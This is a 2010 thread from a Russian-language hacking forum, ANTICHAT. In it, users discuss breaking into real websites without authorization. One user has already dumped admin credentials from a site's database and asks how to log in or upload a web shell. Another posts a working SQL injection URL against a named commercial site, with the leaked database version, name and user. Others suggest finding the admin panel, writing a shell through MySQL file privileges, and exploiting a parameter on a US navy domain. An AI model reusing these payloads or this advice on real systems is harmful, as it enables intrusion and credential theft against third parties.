ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
сейчас доступен на antichat.xyz.
 |
|
18.03.2010, 17:53
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Скажите, если у меня есть логин и пароль админа сайта, как залогинится под ним?
На сайте нет возможности ввести логин, пасс. Слышал, что можно залить шелл, или это не то?
У кого есть ссылка на какую-то статью на эту тему напишите.
|
|
|
18.03.2010, 17:54
|
|
Banned
Регистрация: 05.02.2010
Сообщений: 70
Провел на форуме:
177258
Репутация:
5
|
|
Сообщение от Strilo4ka
скуля есть
PHP код:
http://met-con.com/mdc/index.php?page=-1+union+select+1,concat(version(),0x40,database(),0x40,user()),3,4,5--+
5.0.89-community@metcon_web@metcon_webuser@localhostда я знаю.но мне она нах не нужна, т.к. там .htpasswd auth
|
|
|
|
18.03.2010, 19:12
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
Сообщение от CyberHunter
Скажите, если у меня есть логин и пароль админа сайта, как залогинится под ним?
На сайте нет возможности ввести логин, пасс. Слышал, что можно залить шелл, или это не то?
У кого есть ссылка на какую-то статью на эту тему напишите.
Шелл пока немного не то. Хотя смотря каким макаром ты достал логин и пасс.
Попробуй поискать админку. www.site.ru/admin
или другие варианты мб adm.php ну вобщем дофига. Если нет то пиши лс и адресок сайта мб помогу.
|
|
|
|
18.03.2010, 19:18
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Попробуй поискать админку. www.site.ru/admin
или другие варианты мб adm.php ну вобщем дофига. Если нет то пиши лс и адресок сайта мб помогу.
Это знаю, пробивал - нет.
А почему шелл - не то? Дайте у кого есть инфу на эту тему.
|
|
|
|
18.03.2010, 19:22
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
Дак думаю про mysql.user и file priv = Y и ковычки ты знаешь тут объяснять не надо. Ты способ скажи каким ты пароли достал скули и мб СИ ? А в админку мб вход только с определенных IP ?
|
|
|
|
18.03.2010, 19:44
|
|
Banned
Регистрация: 18.09.2008
Сообщений: 23
Провел на форуме:
94916
Репутация:
5
|
|
http://extensis.cnrc.navy.mil/index.htm?content=http://google.com
Помогите довести до ума  |
|
|
|
18.03.2010, 19:52
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Дак думаю про mysql.user и file priv = Y и ковычки ты знаешь тут объяснять не надо. Ты способ скажи каким ты пароли достал скули и мб СИ ? А в админку мб вход только с определенных IP ?
Админку достал из БД. В таблице юзеров был и админ. Так как это реализовать?
|
|
|
|
18.03.2010, 19:54
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
Бд слита или есть доступ к phpmyadmin?
|
|
|
|
18.03.2010, 19:59
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
Сообщение от FAPSI
http://extensis.cnrc.navy.mil/index.htm?content=http://google.com
Помогите довести до ума
|
|
|
|
18.03.2010, 19:59
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Бд слита или есть доступ к phpmyadmin?
Я просто прочитал бд и увидел там ники и пароли юзеров. Доступа к пхпадмин - нет.
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
